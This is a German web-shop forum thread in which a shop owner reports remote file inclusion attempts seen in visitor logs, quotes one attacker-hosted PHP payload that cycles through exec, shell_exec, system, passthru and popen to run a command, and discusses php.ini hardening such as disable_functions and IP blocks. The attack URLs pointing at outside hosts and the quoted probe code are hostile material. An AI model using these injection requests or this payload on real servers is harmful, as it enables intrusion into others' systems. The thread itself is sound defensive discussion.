Zum Thema Sicherheit: Angriffe auf das Shopsystem

[Saunders Computer]

Guten Tag,

heute ist mir im Who's online Modul dieser Besucher aufgefallen.

Er hat offensichtlich versucht auf Shopinterne Daten zuzugreifen, mit folgendem, per Hand eingegebenen Aufruf:

00:07:38 0 Guest 91.121.89.135 20:09:31 20:09:31 /index.php?cat=c802_Handys---Navigation.html%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.anyche.com/goods_img1/satu.txt??

Was könnte er damit bezwecken wollen und wie muss ich das bewerten?

Vielen Dank für Ratschläge.

[Saunders Computer]

Und noch einer:

00:11:20 0 Guest 80.249.173.242 21:17:02 21:17:02/index.php?cat=c802_Handys---Navigation.html///?_SERVER[DOCUMENT_ROOT]=http://www.red-zone.com.ua/ec.txt??

http://www.red-zone.com.ua/ec.txt sieht so aus:

Die Textdatei <?php

echo "Mic22";

$cmd="id";

$eseguicmd=ex($cmd);

echo $eseguicmd;

function ex($cfe){

$res = '';

if (!empty($cfe)){

if(function_exists('exec')){

@exec($cfe,$res);

$res = join("\n",$res);

}

elseif(function_exists('shell_exec')){

$res = @shell_exec($cfe);

}

elseif(function_exists('system')){

@ob_start();

@system($cfe);

$res = @ob_get_contents();

@ob_end_clean();

}

elseif(function_exists('passthru')){

@ob_start();

@passthru($cfe);

$res = @ob_get_contents();

@ob_end_clean();

}

elseif(@is_resource($f = @popen($cfe,"r"))){

$res = "";

while(!@feof($f)) { $res .= @fread($f,1024); }

@pclose($f);

}}

return $res;

}

exit;

[df:bug]

Hallo,

schau mal hier, hab ich bei google.de gefunden. Da muss ich das nicht erklären, handelt sich um eine versuchte PHP Injection.

Link: Umfangreiche PHP-Abfragen via Kotaktmodul von NukeStyles Contact!

Edit: Das habe ich noch hier im Forum gefunden: http://www.xt-commerce.com/forum/shopbereich/63756-hackversuch.html

Viele Grüße,

df:bug

[Saunders Computer]

so jetzt habe ich darauf geachtet, dass

in der php.ini eingestellt ist:

allow_url_fopen = Off

disable_functions = exec,passthru,shell_exec,system,proc_close,proc_get_status,proc_nice,proc_open,proc_terminate

register_globals = Off

SafeMode = On

Habt Ihr vll. noch ein paar Vorschläge?

Teilweise wurde berichtet, das o.g. Code auch über das Kontaktformular eingeschleust werden kann.

Kann man dem auch entgegenwirken?

Gruß

[df:bug]

Hallo,

wer will kommt irgendwie rein, aber so bist du auf einem gutem Wege, sind die Kleinigkeiten weg, wird es für den Angreifer schwieriger.

Viele Grüße,

df:bug

[Saunders Computer]

Hierbei handelt es sich eindeutig um einen unzulässigen zugriff........

hilft da noch eine einfache ip sperre über .htacess oder muss man das direkt in der product_info.php ausschließen? (root server)

Hat jemand ähnliche Beobachtungen gemacht und wenn ja, kann mir einer sagen was ich davon halten soll?

Aus Who's online:

78.34.43.47 22:46:27 22:46:27

/product_info.php?info=http://217.218.225.2:2082/index.html?

Vielen Dank